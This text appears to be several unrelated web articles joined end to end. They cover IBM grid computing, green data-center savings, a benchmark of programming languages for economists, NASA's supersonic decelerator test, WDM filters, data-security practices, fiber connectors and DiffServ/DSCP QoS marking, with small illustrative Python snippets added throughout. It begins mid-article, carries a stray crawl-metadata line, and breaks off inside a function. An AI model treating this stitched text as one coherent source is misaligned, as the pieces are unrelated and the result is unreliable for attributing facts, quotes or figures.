Eventually, IBM, Armonk, N.Y., believes there will come a time when companies and private individuals may actually purchase computing power in a way not unlike how customers currently buy electricity, essentially paying for what they use.
"This collaboration is a big step forward in realizing the grid's promise of delivering computing resources as a utility-like service," Rahmani said.
In taking the first steps to build out the grid, IBM and the National Energy Research Scientific Computing Center (NERSC), a part of the Department of Energy, said Friday that they have successfully integrated the first high-performance computers and storage devices into the grid.
Among the systems connected was a 3,328-processor IBM supercomputer used by the NERSC. That system is listed as the third most powerful computer in the world, according to the TOP500 List of Supercomputers.
In addition to the large supercomputer system, grid software will be integrated into NERSC's High Performance Storage System archival data storage system, which has a capacity of 1.3 petabytes and is managed using IBM servers.
The primary goal of the new grid, according to the DOE, will be to enable scientists at national laboratories and universities around the country to perform ever-greater calculations, manage and analyze ever-larger datasets, and perform more complex computer modeling necessary for DOE to accomplish its scientific missions.
The NERSC is located at the DOE's Lawrence Berkeley National Laboratory in Berkeley, Calif.
The Post-Green Era
By Samuel Greengard | Posted 2009-02-22
A good energy policy can supercharge an organization’s performance through direct electricity savings, a diminished need for facilities, and lower capital costs related to servers, storage and other devices.
Only a few years ago, the concept of going green was reserved mostly for tree-hugging environmentalists bent on making the world a better place. Today, business and IT are heading into a bold new era that could easily be called post-green. However, many executives—and companies—are still out of touch with the need to boost data center energy efficiency and build a more optimized IT infrastructure.
“For years, there hadn’t been a big emphasis on energy consumption,” says Simon Mingay, research vice president for Gartner. “Power was cheap and plentiful, and price wasn’t a limiting factor. There also hadn’t been much of a focus on greenhouse emissions. But the current economic downturn is forcing organizations to look at costs more closely than ever.”
According to the U.S. Environmental Protection Agency (EPA), the nation’s servers and data centers consumed approximately 61 billion kilowatt-hours in 2006—double 2000’s consumption. And there’s no end in sight. The same EPA report says energy consumption could double again by 2011—even with more efficient systems and better monitoring methods.
Meanwhile, consulting firm McKinsey reports that information and communications technologies—including laptops and PCs, data centers and computing networks, mobile phones and telecommunications networks—could be among the biggest greenhouse gas emitters by 2020.
Many companies are beginning to take action. At Highmark, for example, the introduction of a new corporate data center in November 2005 represented an opportunity to embrace more energy-efficient practices. The company launched its initiative with a U.S. Green Building Council Leadership in Energy and Environmental Design (LEED)-certified facility. It features an Energy Star roof that collects rainwater and stores it in a 100,000-gallon underground tank. It’s used for gray water in restrooms and in cooling towers for the data center (the system evaporates 1,200 gallons of water each day). The building also includes smart lighting systems.
But the company didn’t stop there. Highmark, using energy auditing tools and consulting expertise from IBM, then conducted a thermal analysis of its data center and determined how to space servers and racks for maximum performance and reduced cooling costs. “The important thing was to understand every piece of equipment and what was actually drawing the power,” says Wood, who discovered that 80 percent of the firm’s business transactions were pulling only 20 percent of the power.
“We found that a lot of servers in our data center weren’t being used, even though they were powered up,” Wood continues. “So, the first thing we did was power down those servers when they weren’t in use. Most data centers operate in always-on mode, but we wanted to go to an on-off approach.”
At the same time, IT began switching off unused systems in burning rooms and taking a closer look at how employees used their computers. Finally, the company adopted a server virtualization and consolidation strategy. As a result, three-quarters of Highmark’s 400 servers are now virtualized.
“We picked the low-hanging fruit and then began to look for more opportunities,” Wood recalls. The bottom line? Highmark cut kilowatt-hours by 500,000 during 2008, which represents a net savings of approximately $52,000 on the electric bill. That decrease is significant, he says, noting that “in 2010, the rate caps will be lifted by our local utility company, and that will increase our electric bill by 20 percent to 40 percent.”
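A quick back-of-envelope check on the figures above (assuming the 500,000 kWh and the $52,000 describe the same annual saving):

```python
# Sanity-check the quoted savings: implied electricity rate, and what
# the same kWh saving would be worth after the projected rate increases.
kwh_saved = 500_000
dollars_saved = 52_000

rate = dollars_saved / kwh_saved              # implied $/kWh
print(f"implied rate: ${rate:.3f}/kWh")       # about $0.104/kWh

for pct in (20, 40):                          # post-2010 rate-cap scenarios
    print(f"at +{pct}%: ${dollars_saved * (1 + pct / 100):,.0f}/year")
```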
In addition, through virtualization, Highmark has reduced equipment demands—and the resulting energy requirements—by a 14-1 ratio. The firm also has slashed overall energy consumption by 10 percent to 12 percent.
Highmark is now looking to adopt disk virtualization and to possibly use wind and solar technologies to help power the data center. “We do not have an unlimited budget, so we have to pick our battles and ensure that we’re achieving maximum results and ROI,” Wood explains. | <urn:uuid:bccdb8a9-f7c3-420f-889e-6835745cc11e> | CC-MAIN-2017-04 | http://www.baselinemag.com/c/a/IT-Management/Building-an-EnergyEfficient-IT-Infrastructure/1 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280086.25/warc/CC-MAIN-20170116095120-00098-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.94835 | 923 | 2.59375 | 3 |
Lots of non-programmers seem to be learning how to program these days. However, one group of non-programmers who have been programming for a long time are economists. They often have to write code in order to run and evaluate their complex mathematical models and simulations. If you’re an economist, then, faced with having to do some coding, which programming language is best for your use?
Two economists, S. Boragan Aruoba of the University of Maryland and Jesus Fernandez-Villaverde of the University of Pennsylvania, recently set out to answer that question. The results are contained in a new paper published by the National Bureau of Economic Research titled A Comparison of Programming Languages in Economics (Fernandez-Villaverde has made the full paper available for download). Their basic approach was to compare the time it took a handful of programming languages commonly used by economists to solve a well-known economic model.
Specifically, the model they chose to solve is the stochastic neoclassical growth model, considered a “workhorse” in the field, using an algorithm which is representative of the computing economists need to do. They coded the problem in three compiled languages (C++, Fortran, Java) using a variety of compilers and five scripting languages (Julia, Python, Matlab, Mathematica, R) and ran the programs on two platforms, Windows and Mac. The languages were then evaluated based on their code execution time.
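The algorithm the paper benchmarks is value function iteration, so the kernel being timed is a deeply nested loop. The sketch below shows that kind of kernel on a deliberately simplified model (deterministic, log utility, full depreciation); the parameters and grid are illustrative, not the paper's:

```python
# Minimal value function iteration sketch: the triple-nested,
# loop-heavy structure is what makes language speed matter here.
import math

alpha, beta = 0.33, 0.95
grid = [0.05 + 0.001 * i for i in range(100)]    # coarse capital grid
V = [0.0] * len(grid)                            # initial value guess

for _ in range(150):                             # fixed iteration budget
    V_new = []
    for k in grid:
        y = k ** alpha                           # output from capital k
        best = -1e18
        for j, k_next in enumerate(grid):
            c = y - k_next                       # implied consumption
            if c <= 0:
                break                            # grid is increasing, so stop
            v = math.log(c) + beta * V[j]
            if v > best:
                best = v
        V_new.append(best)
    V = V_new

print(f"V at mid-grid capital: {V[len(V) // 2]:.3f}")
```

Every language in the study has to execute essentially this structure millions of times, which is why interpreter overhead dominates the scripting-language results.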
Their paper lays out the full set of elapsed time results for all the language/compiler/platform combinations. Here are the top-level takeaways.
C++ is the fastest programming language for economists
While Fortran is a very popular choice among economists, it was C++ that ran the fastest on both Mac and Windows. The elapsed time for C++ compiled with GCC was 0.73 seconds on the Mac, while it was 0.76 seconds for C++ compiled with Visual C++ on Windows. Fortran was a close second on both platforms; execution time on the Mac for Fortran compiled with GCC was 0.76 seconds, while on Windows it was 0.81 seconds for Intel Fortran. The only other language to come close was Java, which had execution times of 1.95 seconds on Mac and 1.59 seconds on Windows, still roughly twice as slow as C++ and Fortran.
Compiler choice matters
While C++ and Fortran dominated the other languages in execution time, the choice of compiler mattered significantly within those languages. Generally, GCC-compiled code ran significantly faster than Intel-compiled code on the Mac, while the opposite was true on Windows, where the spread was greater. Intel-compiled code ran about twice as fast as GCC-compiled code on Windows for both C++ (0.90 versus 1.73 seconds) and Fortran (0.81 versus 1.73).
Scripting languages were considerably slower than compiled ones
Not surprisingly, scripting languages fared worse than compiled ones, sometimes a whole lot worse. Julia did the best, coming in close to Java, about twice as slow as C++. Matlab was about 10 times slower than C++ on both Mac and Windows, while Python code ranged from being about 40 times slower than C++ on both platforms (for Pypy) to well over 200 times slower (CPython) on the Mac. R ranged from 500 to 700 times slower, while Mathematica did the worst, at 800 times slower than C++ on the Mac. The authors did find, however, that the performance of scripting languages could be greatly increased by compiling parts of the code when possible: Matlab narrows to just about twice as slow as C++ when compiling into Mex (C++) files, with a similar improvement found for Python with Numba.
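The reason partial compilation helps is that the cost sits in the interpreter's per-iteration overhead. As a stdlib-only illustration of that overhead (not the paper's benchmark, and not Numba itself), compare the same reduction written as an explicit Python loop versus the C-implemented built-in:

```python
# Same computation two ways: interpreted loop vs. C-implemented sum().
# The absolute ratio varies by machine; the direction does not.
import time

data = list(range(1_000_000))

t0 = time.perf_counter()
total_loop = 0
for x in data:                     # every iteration pays interpreter cost
    total_loop += x
t_loop = time.perf_counter() - t0

t0 = time.perf_counter()
total_builtin = sum(data)          # the loop runs in C
t_builtin = time.perf_counter() - t0

assert total_loop == total_builtin
print(f"loop/built-in time ratio: {t_loop / max(t_builtin, 1e-9):.1f}x")
```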
One of the important caveats of the study is that the researchers made no attempt to use special features of each language to optimize the code, instead opting for similar implementations across the languages as a way to control for programmer skill and because it would make comparison difficult.
What does this research mean for the general population of software developers? Probably not much, since professional programmers with deep knowledge of these languages could optimize the code and, presumably, come up with very different results. In fact, the authors have made their code available on GitHub, so if you’d like to see how the language perform when optimized, have at it.
How relevant are these findings, though, for economists? Even that's questionable, since the choice of programming language will depend on things other than code execution time, like the learning curve. Plus, different languages may be better for solving different kinds of problems. Finally, execution time may ultimately not matter much to economists anyway, so long as they can get a reliable solution using a language they know. But if you're a young economist trying to decide which language to invest some time in learning, these results suggest that C++ is the way to go.
In any case, I still find it interesting that a non-programming profession which does quite a bit of coding is making a serious effort to consider which language is best. The authors plan to consider the performance of functional programming languages in a forthcoming paper. I’ll report back on that once the paper is available.
NASA wants to send ever-heavier spacecraft – along with humans at some point – to Mars and to make that feasible it will need a system that can slow down that equipment for a safe landing.
Taking one of the first steps to develop that system will be a distinctly flying-saucer-like test vehicle that will, sometime in the next two weeks, blast off from the U.S. Navy's Pacific Missile Range Facility in Kauai, Hawaii, for what NASA calls its first engineering shakeout flight.
NASA says it is developing three flying saucers, or rather, Low Density Supersonic Decelerator (LDSD) systems. The first two are supersonic inflatable aerodynamic decelerators -- very large, durable, balloon-like pressure vessels that inflate around the entry vehicle and slow it from Mach 3.5 or greater to Mach 2 or lower.
These decelerators are being developed in 6-meter-diameter and 8-meter-diameter configurations, NASA said. Also in development is a 30.5-meter-diameter parachute that will further slow the entry vehicle from Mach 1.5 or Mach 2 to subsonic speeds. All three devices will be the largest of their kind ever flown at speeds several times greater than the speed of sound, NASA said.
The six-meter version will be the one tested over the Pacific first.
Here’s what the mission looks like:
- NASA plans to use the very thin air found high in Earth’s stratosphere as a test bed for the LDSD mission.
- To reach the desired altitude of 120,000 feet, the LDSD project will use a helium-filled scientific balloon provided by NASA’s Wallops Flight Facility and Columbia Scientific Balloon Facility. When fully deployed, the balloon is over 34 million cubic feet: large enough to fit a professional football stadium inside. The balloon is made of polyethylene, a very thin film of similar thickness to sandwich wrap, yet it will lift the massive test article to 120,000 feet.
- At that altitude, the test article will be detached from the balloon and a Star 48B long-nozzle, solid-fueled rocket engine will be employed to boost it on a trajectory reaching the supersonic speeds (Mach 4) needed to test the 6-meter supersonic inflatable aerodynamic decelerator (SIAD-R) and the supersonic parachute, a full year ahead of schedule.
- The SIAD-R, essentially an inflatable doughnut that increases the vehicle's size and, as a result, its drag, is deployed at about Mach 3.8. It will quickly slow the vehicle to Mach 2.5 where the parachute, the largest supersonic parachute ever flown, first hits the supersonic flow.
- Once at supersonic speeds, the deployment and function of the inflatable decelerator will be tested as it slows the test article to a speed (about Mach 2.5) where it becomes safe to deploy the supersonic parachute. About 45 minutes later, the saucer is expected to make a controlled landing onto the Pacific Ocean.
- The balloon and test article will all be recovered.
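The drag mechanism in the sequence above can be made concrete: supersonic drag scales with frontal area (drag = ½·ρ·v²·C_d·A), so inflating a ring around the vehicle multiplies A. The pre-inflation body diameter below is an assumed illustrative figure, not NASA's spec:

```python
# How much frontal area the inflatable ring adds. The 4.7 m body
# diameter is an assumption for illustration; the 6 m SIAD-R figure
# comes from the article.
import math

def frontal_area(diameter_m):
    return math.pi * (diameter_m / 2) ** 2

d_body, d_siad = 4.7, 6.0
gain = frontal_area(d_siad) / frontal_area(d_body)
print(f"frontal area grows by ~{gain:.2f}x (drag scales with it)")
```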
"The success of this experimental test flight will be measured by the success of the test vehicle to launch and fly its flight profile as advertised. If our flying saucer hits its speed and altitude targets, it will be a great day," said Mark Adler, project manager for the Low Density Supersonic Decelerator at NASA's Jet Propulsion Laboratory (JPL) in Pasadena, California.
The other two supersonic decelerator technologies will be thoroughly tested during two LDSD flight tests next year, NASA stated.
The point of all this is to increase the size of the payload NASA can deliver to the Mars surface. These new drag devices can increase payload delivery to the surface of Mars from our current capability of 1.5 metric tons to 2 to 3 metric tons, depending on which inflatable decelerator is used in combination with the parachute, NASA said. They will increase available landing altitudes by 2-3 kilometers, increasing the accessible surface area we can explore. They also will improve landing accuracy from a margin of 10 kilometers to just 3 kilometers.
The optical devices most often used to selectively transmit certain wavelengths are called filters, a term that covers a broad range of devices, including attenuators. Filters play important roles in Wavelength Division Multiplexing (WDM) systems, although other technologies may also be used. WDM filters can separate or combine optical signals carried on different wavelengths in a cost-effective manner.
In the world of optics, “filter” often is a broad term applied to components that filter out part of the incident light and transmit the rest. In WDM systems, the wavelengths that are not transmitted through the filter normally are reflected so they can go elsewhere in the system. Such filters are like mirror shades or one-way mirrors, which reflect most incident light, but transmit enough for you to see through them.
Common optical filters accommodate channel growth without service interruption. In addition, the filters’ low network-to-express loss allows stacking, which is essential for scaling new wavelengths. Most filters are equipped with an express port to pass through non-dropped/added WDM channels. Interconnecting express ports of two filters forms an Optical Add/Drop Multiplexer (OADM) with east/west fiber connections. High filter isolation eliminates disruptive “shadow” wavelengths and allows channels that have been dropped at a node to be used elsewhere downstream.
Interference filters and other technologies can be used to separate and combine wavelengths in WDM systems. Several approaches are now competing for WDM applications; some appear to have advantages for certain types of WDM systems, but the field is still evolving, and no single approach dominates. Although these technologies work in different ways, they can achieve the common goal of optical multiplexing and demultiplexing.
There are three competing filter technologies: Thin Film Filters (TFF), Array Waveguides (AWG), and Fiber Bragg Gratings (FBG). Thin film filters were adopted very early and have been widely deployed because they have unique attributes that meet the stringent requirements of optical communication systems.
Wide band WDM filters – used in EDFAs as pump couplers and supervisory channel monitors. This family covers a wide variety of other filters as well; their applications range from CWDM (Coarse WDM), to bi-directional transceivers, to 1310/1490/1550 nm tri-band filters for fiber to the home (FTTH).
Fiber Bragg gratings work similarly by reflecting specific wavelengths. WDM applications require the use of many interference filters or fiber gratings, with each one picking off an individual wavelength or group of wavelengths.
FTTX Filter WDM modules are based on thin film filter technology. The FiberStore filter-based WDM product family covers the following wavelength windows commonly used in optical fiber systems: 1310/1550 nm (for WDM or DWDM optical communications), 1480/1550 nm (for high-power DWDM optical amplifiers/EDFAs), 1510/1550 nm (for DWDM multi-channel optical networks), 980/1550 nm (for high-performance DWDM optical amplifiers/EDFAs), and 1310/1490/1550 nm (for PON/FTTX/test instruments). Compared with fused fiber WDM couplers, filter-based WDM components have much wider operating bandwidth, lower insertion loss, higher power handling, and higher isolation.
Electronic data resides in two basic areas:
- In bulk in some form of repository, such as a database or collections of individual files (called data at rest)
- In small quantities being transmitted over a network (called data on the wire)
Your data is vulnerable no matter where it resides. While most companies take security precautions, many of those precautions turn out to be insufficient to protect valuable corporate assets. The key lies in knowing where vulnerabilities exist and making appropriate risk-based decisions.
The ability to gather and share volumes of information was the primary reason behind the creation of the Internet, but such wide availability greatly magnifies the risk of that information being compromised. Attacks against large databases of critical information are on the rise, such as in the following recent cases:
- February, 2003: A hacker broke into the security system of a company that processes credit card transactions, giving the hacker access to the records of millions of Visa and MasterCard accounts.
- June, 2004: More than 145,000 blood donors were warned that they could be at risk for identity theft from a stolen university laptop containing their personal information.
- October, 2004: A hacker accessed names and social security numbers of about 1.4 million Californians after breaking into a University of California, Berkeley computer.
NOTE – Identity theft occurs when someone uses your personal information—such as your name, social security number, credit card number, or other identifying information—without your permission, frequently to commit fraud or other crimes.
Vulnerabilities of Data on the Wire
Data on the wire is vulnerable to some very focused attacks. Data can be intercepted (sniffed). ARP attacks can be used to sniff information in a switched environment. ARP attacks can also be used to initiate “man in the middle” attacks that can allow an attacker to intercept and potentially modify information in transit.
Sniffing refers to a technique for capturing network traffic. While sniffing can be accomplished on both shared and switched networks, it’s much easier in a shared (hub-based) environment:
- On a shared segment, the hub repeats every frame to every attached host, and each host handles the problem of parsing out the specific information that it needs from the general traffic.
- In a switched environment, switches send traffic only to its intended host (determined by the destination address in each individual frame).
Operating in a switched environment doesn’t totally alleviate the risk of sniffing, but it does mitigate that risk to a large degree.
Most networks today also utilize virtual LAN (VLAN) configurations to segment network traffic and further reduce the risk of sniffing. A VLAN is a switched network that’s logically segmented. VLANs are created to provide the segmentation services traditionally provided by routers in LAN configurations. VLANs address scalability, security, and network management. Routers in VLAN topologies provide broadcast filtering, security, address summarization, and traffic-flow management.
Just as switches isolate collision domains for attached hosts and only forward appropriate traffic out a particular port, VLANs provide complete isolation between VLANs. None of the switches within the defined group will bridge any frames—not even broadcast frames—between two VLANs. Thus, communication between VLANs is accomplished through routing, and the traditional security and filtering functions of the router can be used.
Segmentation can be organized in any manner: function, project team, application. This capability is especially useful for isolating network segments for security purposes. For example, you may place application servers on one VLAN and system administrators on another (management-level) VLAN, with access control lists to restrict administrative access to only that VLAN. This setup can be accomplished regardless of physical connections to the network or the fact that some users might be intermingled with other teams.
The Ethernet Address Resolution Protocol (ARP) enables systems to find the unique identifier (MAC address) of a destination machine. ARP attacks provide the means to either break or misuse the protocol, with the goal of redirecting traffic from its intended destination. In an ARP attack, the attacker can sniff, intercept, and even modify traffic on a compromised network segment.
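The cache-poisoning mechanism behind these attacks can be modeled in a few lines. This is a deliberately simplified sketch (a dictionary standing in for a host's ARP cache), not an attack tool: classic ARP has no authentication, so a naive cache simply believes the most recent reply it hears.

```python
def process_arp_reply(cache, ip, mac):
    """Update the cache the way a naive ARP implementation does:
    no authentication, last reply wins."""
    cache[ip] = mac

arp_cache = {}
process_arp_reply(arp_cache, "10.0.0.1", "aa:aa:aa:aa:aa:aa")  # legitimate gateway reply
process_arp_reply(arp_cache, "10.0.0.1", "ee:ee:ee:ee:ee:ee")  # forged reply from attacker

# Frames addressed to the gateway now go to the attacker's MAC address,
# enabling sniffing or a man-in-the-middle position.
print(arp_cache["10.0.0.1"])  # ee:ee:ee:ee:ee:ee
```

Defenses such as dynamic ARP inspection work precisely because they refuse to apply the "last reply wins" rule blindly.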
The effectiveness of these attacks is limited in two ways:
- Data on the wire is generally available only in small pieces. It’s true that many systems and applications send login/password pairs in clear text (without any encryption). An attacker may capture such small bits of data; it may even be possible over time to assemble enough useful information to make identity theft possible. However, the attacker must either be directly connected to the internal network, or have succeeded in compromising an internal system and installing some form of sniffer to gather information. For the effort to be worthwhile to the hacker, many small chunks would need to be captured and then filtered out of the massive volumes of traffic traversing most of today’s networks; and then the captured data would have to be reassembled into meaningful information. This is a tremendous task with a potentially very small payoff.
- Capturing data takes time. The longer the attacker is inside the network, the more likely he or she is to get caught. It’s easier to get information at the source, rather than trying to capture and decode thousands of network packets.
Vulnerabilities of Data at Rest
While sniffing data on the wire may yield a big reward, data at rest is the proverbial pot of gold. Most organizations maintain detailed databases of their personnel information, for example, making the large corporation a very tempting target. These databases regularly contain quantities of names, addresses, and even social security numbers for tax purposes. This is all the information that someone needs to steal your identity. Statistics show that identity theft attacks are increasing. More than thirty thousand victims reported ID theft in 2000; in 2003, the Federal Trade Commission received more than half a million complaints.
A major issue in protecting your data repository is the fact that there are so many avenues of attack. Attacks can be launched against the operating system, the database server application, the custom application interface, the client interface, and so on. Application attacks don’t have to be directed against the target application, either. Any attack providing system-level access to an attacker is a risk to your data.
Your system is also a potential target for a multitude of computer viruses, worms, and Trojans. Current reports put the number of these types of applications at more than 100,000. Many recent computer worms leave systems vulnerable by covertly installing a backdoor that enables the attacker to enter the system at will.
How Can We Protect Our Data?
How do we defend against so many possible attack vectors? The key is to focus on the data. The first step should be data-sensitivity analysis as part of an overall risk-assessment process. Data-sensitivity analysis begins by identifying an organization’s critical data and ways in which that data is used. Once the sensitivity of data has been classified, the organization can reach decisions about the necessary level of protection for that data. Your tendency may be to apply the greatest level of protection available, but that level may be neither necessary nor cost-effective. For example, you wouldn’t spend $100,000 on a firewall to protect an expected loss of only $5,000. You can get a better idea of how to apply countermeasures if you include a loss/impact analysis as part of the risk-assessment process.
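The loss/impact comparison in the firewall example can be made concrete with annualized loss expectancy (ALE): the single loss expectancy multiplied by the annual rate of occurrence. The sketch below uses hypothetical numbers echoing the example above.

```python
def annualized_loss_expectancy(single_loss, annual_rate):
    """ALE = SLE x ARO: the expected yearly loss from a given threat."""
    return single_loss * annual_rate

# Hypothetical figures matching the example in the text:
ale = annualized_loss_expectancy(single_loss=5_000, annual_rate=1.0)
countermeasure_cost = 100_000  # annualized cost of the proposed firewall

# A countermeasure is cost-justified only when it costs less
# than the loss it is expected to prevent.
justified = countermeasure_cost < ale
print(ale, justified)  # 5000.0 False
```

Real assessments weigh multiple threats and partial risk reduction, but the same comparison sits at the core of the decision.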
A simple approach to data protection looks at the various layers of security that can be applied. Consider the following starting checklist:
- Do you need to encrypt the data repository?
- Do you need a hash of the transactions for integrity purposes?
- Should you digitally sign transactions?
- Make sure that database logging is enabled and properly configured.
- Harden the operating system.
- Disable unnecessary services and close ports.
- Change system defaults.
- Don’t use group or shared account passwords.
- Lock down file shares.
- Restrict access to only necessary personnel.
- Consider host-based firewalls and intrusion detection for critical servers.
- Maintain proper patch procedures.
- Use switches rather than routers or hubs as much as possible.
- Lock down unused router/switch ports.
- Consider MAC filters for critical systems.
- Establish logical subnets and VLANs.
- Set up access control lists (ACLs) for access routes.
- Use ingress/egress filters, anti-spoof rules.
- Determine appropriate location and functionality for network-based firewalls and intrusion detection.
- Use encrypted logins or SSL for web-based sessions.
Physical security for data:
- Establish input/output handling procedures.
- Use physical access logs for server rooms and network operations centers.
- Document tape-handling procedures, tape rotation, offsite storage.
- Consider an alternate data center.
- Archiving: Where does your data go to rest in peace?
- Data destruction: Degauss, erase/overwrite, physical destruction?
- How is data handled when equipment is sent out for repair, replacement, or end of life?
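Two of the checklist items above, hashing transactions for integrity and signing them, can be sketched with Python's standard library. An HMAC is used here as a stand-in for a true digital signature (a real signature would use asymmetric keys); the record and key values are hypothetical.

```python
import hashlib
import hmac

def transaction_digest(record: bytes) -> str:
    """Plain hash: detects accidental corruption of a stored transaction."""
    return hashlib.sha256(record).hexdigest()

def transaction_tag(record: bytes, key: bytes) -> str:
    """Keyed HMAC: also detects deliberate tampering by anyone without the key."""
    return hmac.new(key, record, hashlib.sha256).hexdigest()

record = b"acct=1234;amount=500.00"
key = b"demo-secret-key"  # illustration only; real keys belong in a key store

tag = transaction_tag(record, key)
tampered = b"acct=1234;amount=9500.00"

# compare_digest avoids timing side channels when verifying tags
print(hmac.compare_digest(tag, transaction_tag(record, key)))    # True
print(hmac.compare_digest(tag, transaction_tag(tampered, key)))  # False
```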
This is just a quick list of points to consider. Fortunately, folks much smarter than I am have developed a much more comprehensive approach.
Security standards and guidance are available, especially for organizations that are part of or do business with the U.S. government. Through the work of various organizations, the government has put together a program known as Certification & Accreditation (C&A). Standards have been and continue to be developed that provide guidance on the performance of risk assessments, development of security plans, and the application of security controls.
The Computer Security Division of the National Institute of Standards and Technology (NIST) has been assigned this important multi-part task:
- Improving federal information-systems security by raising awareness of IT risks, vulnerabilities, and protection requirements, particularly for new and emerging technologies.
- Researching, studying, and advising agencies of IT vulnerabilities and devising techniques for the cost-effective security and privacy of sensitive federal systems.
- Developing standards, metrics, tests, and validation programs.
- Developing guidance to increase secure IT planning, implementation, management, and operation.
The C&A process is explained and documented in NIST’s publications. NIST’s guidelines provide an excellent framework for selecting, specifying, employing, and evaluating the security controls in information systems.
Data is under constant attack from a growing number of sources. It’s vital that you know what data you have, how sensitive that data is, how critical it is to your corporate mission, and the risks it faces. Perform a risk assessment, and, once the threat level has been determined, develop an appropriate plan to protect that data with multiple layers of security. Only by being aware of your valuable assets can you properly monitor and protect them.
Fiber optic connectors are widely used in fiber optic transmission lines, fiber optic patch panels, and fiber optic test instruments and meters. The fiber connector is one of the most essential components for fiber optic communication: it mates or connects with optical devices, modules, and fibers. The fiber connector is also a key part of fiber patch cords and fiber pigtails.
In fiber optic system design, you must plan not only for normal operation but also for unexpected problems. If you are building a local network or LAN, you will most likely need fiber patch cables and perhaps a hub; choosing good equipment depends on a few factors, including availability. During the design process, the worst-case scenarios and related contingency plans should be considered alongside the expected operating results. Security, stability, and system access all require that the end of the fiber be smooth and neat, and connections must be made with micron accuracy (millionths of a meter). The diameter of commonly used multimode fiber is 50 to 62.5 microns, while the diameter of single-mode fiber is only 8-9 microns. Compared with the diameter of a human hair (17-180 microns), it is clear that even a trace of misalignment can bring catastrophic losses.
With the expansion of technology development and application, fiber optic patch cables are also developing rapidly. There are probably 12 or more types of fiber optic connectors on the market, each launched to meet specific needs, and each with some technical limitations. The market trend is toward moderately priced, compact plug designs that can support the requirements of new transmission and distribution systems. Users expect the ongoing development of the telecommunications industry to support large-scale application of optical fiber, driven largely by the rapid growth in demand for communication and entertainment services over the fiber link.
Fiber optic connections demand very high accuracy from the equipment, and fiber patch cords come in many kinds. The connector must therefore be kept very clean. Fiber optic connectors and accessories are usually mounted in housings; a fingerprint or external dust can seriously degrade the performance of the connector and even cause loss of communication. Therefore, a connector should be stored in a clean protective sleeve whenever it is not connected.
By transmission medium, fiber optic connectors can be divided into common silica-based single-mode and multimode connectors, as well as connectors for other media such as plastic optical fiber. By structure, they can be divided into FC, SC, ST, LC, D4, DIN, MU, MT, and other forms. The optical interface is the physical interface used to connect fiber optic cable. FiberStore, a professional fiber optic products manufacturer in China, offers various kinds of fiber optic connectors, including FC, LC, SC, and ST connectors. You can buy fiber optic connection products from our store with confidence; all fiber optic supplies are high quality at low prices.
In the previous discussion on QoS, the per-hop behaviors DiffServ uses to mark packets were identified. These were listed as:
- Expedited Forwarding (EF) – RFC 3246 – Provides a strict priority service
- Assured Forwarding (AF) – RFC 2597 – Provides a qualified delivery guarantee, and provides for over-subscription, markdown and dropping schemes for excess traffic
- Class Selectors (CS) – RFC 2474 – Provides code points that can be used for backward compatibility with IP Precedence models
- Best-Effort – Provides delivery when possible
Layer 3 packets are marked with IP Precedence or Differentiated Services Code Points (DSCP) in the Type-Of-Service (TOS) byte that is in the IP Header. In order to understand QoS we must take a look at the TOS byte and understand what the eight bits are doing within this byte.
IP Precedence – RFC 1812
IP Precedence (IPP) is viewed by many as a legacy technology, but must still be observed for backwards compatibility.
The second byte in an IPv4 packet is the TOS byte. The first 3 bits are referred to as the IP Precedence bits. The three IP Precedence bits allow for only eight values (0-7); generally, 6 and 7 are reserved for network control traffic such as routing protocols. The value 0 is normally reserved for default behavior, leaving only five values for traffic other than best-effort behavior.
- IPP Value of 5 is recommended for voice
- IPP Value of 4 is recommended for interactive and streaming video
- IPP Value of 3 is recommended for call control and signaling
IPP values 1 and 2 are the remaining markings for all data applications. This is commonly found to be too restrictive, resulting in a move to the more scalable 6-bit, 64-value Differentiated Services Code Point (DSCP).
The IPP bits are mainly used to classify packets at the edge of the network into one of the eight possible categories. Packets of lower precedence (lower values) can be dropped in favor of higher precedence when there is congestion on the network.
Differentiated Services Code Point (DSCP) – RFC 2474
DSCP uses the same three bits as IP Precedence plus the next three bits, for a total of six bits. Six bits provide a range of 64 different DSCP values. These values can be expressed in numeric form or by keyword names called per-hop behaviors (PHBs). A collection of packets that has the same DSCP value in the TOS byte and crosses a link in a particular direction is called a Behavior Aggregate (BA).
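The bit layout is easy to verify with a couple of shifts. In this sketch the full TOS byte is the input: DSCP is its top six bits and IPP its top three, so a voice packet marked EF (DSCP 46) carries a TOS byte of 0xB8.

```python
def dscp_from_tos(tos: int) -> int:
    """DSCP occupies the six high-order bits of the (former) TOS byte."""
    return (tos >> 2) & 0x3F

def ipp_from_tos(tos: int) -> int:
    """IP Precedence occupies the three high-order bits of the same byte."""
    return (tos >> 5) & 0x07

tos = 0xB8  # 1011 1000: the TOS byte carried by an EF-marked voice packet
print(dscp_from_tos(tos), ipp_from_tos(tos))  # 46 5
```

Because both fields share the same three leading bits, any DSCP value degrades gracefully to an IPP value on older equipment.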
A PHB refers to the packet scheduling, queuing, policing, or shaping behavior of a node on any given packet belonging to a BA. The four standard PHBs are available to construct a DiffServ enabled network and achieve end-to-end QoS. The four PHBs are:
- Best Effort (BE) or DSCP 0, also known as default
- Assured Forwarding (AFxy) – 12 AF PHBs exist
- Expedited Forwarding (EF) – EF PHB has a DSCP value of 46, for time sensitive traffic such as voice
- Class-Selector (CSx) which have been designed to be backward compatible with IP Precedence
Assured Forwarding (AF) – RFC 2597
AF defines a method by which packets can be given different forwarding assurances. Traffic can be divided into different classes and then each class given a certain percentage of bandwidth. For example, one class could have 50% of the available link bandwidth; one class could have 30% and another 20% of the bandwidth.
Assured forwarding is denoted by the letters AF and then two digits. The first digit denotes the AF class and can range from 1–4. These first 3 bits of the AF correspond to IPP. The second digit refers to the level of drop probability within the AF class.
Something interesting to note about AF is that within each class, the first 3 bits are the same for all three drop probabilities. Also notice that a Class 1 AF corresponds to an IPP of 1, a Class 2 AF corresponds to an IPP of 2, and so on.
- Class 1 AF PHB = 001
- Class 2 AF PHB = 010
- Class 3 AF PHB = 011
- Class 4 AF PHB = 100
The second digit, or the drop probability, functions in the following way during periods of congestion: the higher the number, the more likely the packet is to be dropped. For example, packets assigned AF13 will be dropped before packets in the AF12 class. This method will penalize flows with a BA that exceeds the assigned bandwidth. Packets of these flows could also be marked again by a policer to a higher drop precedence.
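The AFxy encoding described above can be computed directly: the class x occupies the three high (IPP-compatible) bits and the drop precedence y the next two, giving DSCP = 8x + 2y. A quick sketch:

```python
def af_dscp(af_class: int, drop_precedence: int) -> int:
    """DSCP value for AF<class><drop>: DSCP = 8 * class + 2 * drop."""
    if not (1 <= af_class <= 4 and 1 <= drop_precedence <= 3):
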